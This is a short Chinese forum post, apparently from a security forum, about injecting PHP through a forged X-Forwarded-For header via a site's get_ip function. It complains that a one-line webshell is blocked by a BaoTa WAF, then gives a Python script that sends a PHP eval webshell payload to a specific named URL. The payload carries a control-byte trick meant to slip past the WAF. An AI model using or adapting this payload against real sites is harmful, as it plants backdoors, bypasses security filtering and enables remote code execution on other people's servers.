get_ip这个函数的问题,伪造了HTTP_X_FORWARDED_FOR头http://f-0187.hssybp.cn/uewqewqa.php
写入其他php都行,就是写入一句话不行会被拦截,开了宝塔waf
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
# coding: utf-8 import urllib import requests php = '<?php extract($_REQUEST);@eval%01($x);?>' header={ 'x-forwarded-for' : urllib.parse.unquote(php) } print(requests.get('http://f-0187.hssybp.cn/uewqewqa.php', headers=header).text)